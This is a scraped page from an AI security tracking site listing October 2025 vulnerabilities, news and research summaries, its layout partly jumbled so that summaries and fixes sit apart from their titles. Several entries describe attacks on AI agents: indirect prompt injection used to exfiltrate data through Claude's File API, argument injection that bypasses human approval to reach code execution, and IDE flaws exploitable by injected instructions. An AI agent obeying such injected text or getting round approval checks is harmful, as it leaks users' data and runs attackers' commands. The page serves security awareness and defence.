aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

to
Export CSV
3230 items

CVE-2025-11200: MLflow Weak Password Requirements Authentication Bypass Vulnerability. This vulnerability allows remote attackers to byp

criticalvulnerability
security
Oct 29, 2025
CVE-2025-11200

CVE-2025-11200 is a vulnerability in MLflow that allows remote attackers to bypass authentication (gain access without logging in) because the system has weak password requirements (passwords that are too easy to guess or crack). Attackers can exploit this flaw to access MLflow installations without needing valid credentials.

Fix: A patch is available at the following GitHub commit: https://github.com/mlflow/mlflow/commit/1f74f3f24d8273927b8db392c23e108576936c54

NVD/CVE Database

AI Safety Newsletter #65: Measuring Automation and Superintelligence Moratorium Letter

infonews
policyresearch

CVE-2025-12058: The Keras.Model.load_model method, including when executed with the intended security mitigation safe_mode=True, is vuln

highvulnerability
security
Oct 29, 2025
CVE-2025-12058

CVE-2025-12058 is a vulnerability in Keras (a machine learning library) where the load_model method can be tricked into reading files from a computer's local storage or making network requests to external servers, even when the safe_mode=True security flag is enabled. The problem occurs because the StringLookup layer (a component that converts text into numbers) accepts file paths during model loading, and an attacker can craft a malicious .keras file (a model storage format) to exploit this weakness.

Claude Pirate: Abusing Anthropic's File API For Data Exfiltration

highnews
security
Oct 28, 2025

Anthropic added network request capabilities to Claude's Code Interpreter, which creates a security risk for data exfiltration (unauthorized stealing of sensitive information). An attacker, either controlling the AI model or using indirect prompt injection (hidden malicious instructions in a document the AI processes), could abuse Anthropic's own APIs to steal data that a user has access to, rather than using typical methods like hidden links.

CVE-2025-40058: In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Disallow dirty tracking if incoherent p

infovulnerability
security
Oct 28, 2025
CVE-2025-40058

A Linux kernel vulnerability (CVE-2025-40058) affects Intel VT-d IOMMU (input/output memory management unit, a hardware component that manages memory access for devices) dirty page tracking. Dirty page tracking requires the IOMMU and CPU to keep memory synchronized, but if the IOMMU's page walk (the process of reading memory structure tables) is incoherent (not synchronized), the tracking fails and can cause non-recoverable faults. The fix prevents this misconfiguration by only enabling SSADS (support for dirty tracking) when both ecap_slads and ecap_smpwc hardware capabilities are present.

Lightweight Reparameterizable Integral Neural Networks for Mobile Applications

inforesearchPeer-Reviewed
research

CVE-2025-8709: A SQL injection vulnerability exists in the langchain-ai/langchain repository, specifically in the LangGraph's SQLite st

criticalvulnerability
security
Oct 26, 2025
CVE-2025-8709

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL code into an application) exists in LangGraph's SQLite storage system, specifically in version 2.0.10 of langgraph-checkpoint-sqlite. The vulnerability happens because the code directly combines user input with SQL commands instead of safely separating them, allowing attackers to steal sensitive data like passwords and API keys, and bypass security protections.

v0.14.6

lownews
security
Oct 25, 2025

LlamaIndex v0.14.6 is a software update released on October 26, 2025, that fixes various bugs across multiple components including support for parallel tool calls, metadata handling, embedding format compatibility, and SQL injection vulnerabilities (using parameterized queries instead of raw SQL string concatenation). The release also adds new features like async support for retrievers and integrations with new services like Helicone.

CVE-2025-62612: FastGPT is an AI Agent building platform. Prior to version 4.11.1, in the workflow file reading node, the network link i

mediumvulnerability
security
Oct 22, 2025
CVE-2025-62612

FastGPT, an AI Agent building platform, had a vulnerability in its workflow file reading node where network links were not properly verified, creating a risk of SSRF attacks (server-side request forgery, where an attacker tricks the server into making unwanted requests to other systems). The vulnerability affected versions before 4.11.1.

CVE-2025-11844: Hugging Face Smolagents version 1.20.0 contains an XPath injection vulnerability in the search_item_ctrl_f function loca

highvulnerability
security
Oct 22, 2025
CVE-2025-11844

Hugging Face Smolagents version 1.20.0 has an XPath injection vulnerability (a security flaw where attackers can inject malicious code into XPath queries, which are used to search and navigate document structures) in its web browser function. The vulnerability exists because user input is directly inserted into XPath queries without being cleaned, allowing attackers to bypass search filters, access unintended data, and disrupt automated web tasks.

Prompt injection to RCE in AI agents

highnews
security
Oct 22, 2025

AI agents (software systems that take actions automatically) often execute pre-approved system commands like 'find' and 'grep' for efficiency, but attackers can bypass human approval protections through argument injection attacks (exploiting how command parameters are handled) to achieve remote code execution (RCE, where attackers run unauthorized commands on a system). The article identifies that while these systems block dangerous commands and disable shell operators, they fail to validate command argument flags, creating a common vulnerability across multiple popular AI agent products.

CVE-2025-53066: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE

highvulnerability
security
Oct 21, 2025
CVE-2025-53066

A vulnerability (CVE-2025-53066) exists in Oracle Java SE and related products, affecting multiple versions including Java 8, 11, 17, 21, and 25. An attacker with network access can exploit this flaw in the JAXP component (a Java library for processing XML data) without needing to log in, potentially gaining unauthorized access to sensitive data. The vulnerability has a CVSS score (a 0-10 rating of how severe a vulnerability is) of 7.5, indicating it is a serious threat.

CVE-2025-60511: Moodle OpenAI Chat Block plugin 3.0.1 (2025021700) suffers from an Insecure Direct Object Reference (IDOR) vulnerability

mediumvulnerability
security
Oct 21, 2025
CVE-2025-60511

The Moodle OpenAI Chat Block plugin version 3.0.1 has an IDOR vulnerability (insecure direct object reference, where a user can access resources by directly requesting them without proper permission checks). An authenticated student can bypass validation of the blockId parameter in the plugin's API and impersonate another user's block, such as an administrator's block, allowing them to execute queries with that block's settings, expose sensitive information, and potentially misuse API resources.

CVE-2025-49655: Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not inc

criticalvulnerability
security
Oct 17, 2025
CVE-2025-49655

CVE-2025-49655 is a vulnerability in Keras (a machine learning framework) versions 3.11.0 through 3.11.2 where deserialization (converting saved data back into usable form) of untrusted data can allow malicious code to run on a user's computer when they load a specially crafted Keras file, even if safe mode is enabled. This vulnerability affects both locally stored and remotely downloaded files.

CVE-2025-62356: A path traversal vulnerability in all versions of the Qodo Qodo Gen IDE enables a threat actor to read arbitrary local f

highvulnerability
security
Oct 17, 2025
CVE-2025-62356

CVE-2025-62356 is a path traversal vulnerability (a flaw that lets attackers access files outside intended directories) in all versions of Qodo Gen IDE that allows attackers to read any local files on a user's computer, both inside and outside their projects. The vulnerability can be exploited directly or through indirect prompt injection (tricking the AI by hiding malicious instructions in its input).

CVE-2025-62353: A path traversal vulnerability in all versions of the Windsurf IDE enables a threat actor to read and write arbitrary lo

criticalvulnerability
security
Oct 17, 2025
CVE-2025-62353

CVE-2025-62353 is a path traversal vulnerability (a flaw that lets attackers access files outside intended directories) in all versions of Windsurf IDE that allows attackers to read and write any files on a user's computer. The vulnerability can be exploited directly or through indirect prompt injection (tricking the AI by hiding malicious instructions in its input).

AI Safety Newsletter #64: New AGI Definition and Senate Bill Would Establish Liability for AI Harms

inforegulatory
policyindustry

v0.14.5

infonews
industry
Oct 15, 2025

LlamaIndex v0.14.5 is a release that fixes multiple bugs and adds new features across its ecosystem of AI/LLM tools. Changes include fixing duplicate node positions in documents, improving streaming functionality with AI providers like Anthropic and OpenAI, adding support for new AI models, and enhancing vector storage (database systems that store AI embeddings, which are numerical representations of text meaning) capabilities. The release also introduces new integrations, such as Sglang LLM support and SignNow MCP (model context protocol, a standard for connecting AI tools) tools.

v5.0.1

inforesearchIndustry
industry

v5.0.0

inforesearchIndustry
security
Previous77 / 162Next
Oct 29, 2025

A new benchmark called the Remote Labor Index (RLI) measures whether AI systems can automate real computer work tasks across different professions, showing that current AI agents can only fully automate 2.5% of projects despite improving over time. Additionally, over 50,000 people, including top scientists and Nobel laureates, signed an open letter calling for a moratorium (temporary ban) on developing superintelligence (a hypothetical AI system far more capable than humans) until it can be proven safe and controllable.

CAIS AI Safety Newsletter
NVD/CVE Database
Embrace The Red

Fix: Mark SSADS as supported only when both ecap_slads and ecap_smpwc are supported, preventing the IOMMU from being incorrectly configured for dirty page tracking when operating in incoherent mode.

NVD/CVE Database
Oct 27, 2025

This paper presents RINNs (reparameterizable integral neural networks), a new type of AI model designed to run efficiently on mobile devices with limited computing power. The key innovation is a reparameterization strategy that converts the complex mathematical structure used during training into a simpler feed-forward structure (a straightforward sequence of processing steps) at inference time, allowing these models to achieve high accuracy (79.1%) while running very fast (0.87 milliseconds) on mobile hardware.

IEEE Xplore (Security & AI Journals)
NVD/CVE Database

Fix: The source explicitly mentions one security fix: 'Replace raw SQL string interpolation with proper SQLAlchemy parameterized APIs in PostgresKVStore' (llama-index-storage-kvstore-postgres #20104). Users should update to v0.14.6 to receive this and other bug fixes. No other specific mitigation steps are described in the release notes.

LlamaIndex Security Releases

Fix: Update FastGPT to version 4.11.1 or later, as this issue has been patched in that version.

NVD/CVE Database

Fix: The issue is fixed in version 1.22.0. Users should upgrade Hugging Face Smolagents to version 1.22.0 or later.

NVD/CVE Database

Fix: The article states that 'the impact from this vulnerability class can be limited through improved command execution design using methods like sandboxing (isolating code in a restricted environment) and argument separation.' The text also mentions providing 'actionable recommendations for developers, users, and security engineers,' but the specific recommendations are not detailed in the provided excerpt.

Trail of Bits Blog
NVD/CVE Database
NVD/CVE Database

Fix: Update Keras to version 3.11.3 or later. The GitHub pull request at https://github.com/keras-team/keras/pull/21575 contains the fix.

NVD/CVE Database
NVD/CVE Database
NVD/CVE Database
Oct 16, 2025

The Senate introduced the AI LEAD Act, which would make AI companies legally liable for harms their systems cause, similar to how traditional product liability (the legal responsibility companies have when their products injure people) works for other products. The act would clarify that AI systems count as products subject to liability and would hold companies accountable if they failed to exercise reasonable care in designing the system, providing warnings, or if they sold a defective system. Additionally, China announced new export controls on rare earth metals (elements essential to semiconductors and AI hardware), which could disrupt global AI supply chains if strictly enforced.

Fix: The AI LEAD Act itself serves as the proposed solution: it would establish federal product liability for AI systems, clarify that AI companies are liable for harms if they fail to exercise reasonable care in design or warnings or breach warranties, allow deployers to be held liable for substantially modifying or dangerously misusing systems, prohibit AI companies from limiting liability through consumer contracts, and require foreign AI developers to register agents for service of process in the US before selling products domestically.

CAIS AI Safety Newsletter
LlamaIndex Security Releases
Oct 15, 2025

N/A -- The provided content is a navigation menu and feature listing from GitHub's website, not a security issue, vulnerability report, or technical problem related to AI/LLMs.

MITRE ATLAS Releases
research
Oct 15, 2025

ATLAS Data v5.0.0 introduces a new "Technique Maturity" field that categorizes AI attack techniques based on evidence level, ranging from feasible (proven in research) to realized (used in actual attacks). The release adds 11 new techniques covering AI agent attacks like context poisoning (injecting false information into an AI system's memory), credential theft from AI configurations, and prompt injection (tricking an AI by hiding malicious instructions in its input), plus updates to existing techniques and case studies.

MITRE ATLAS Releases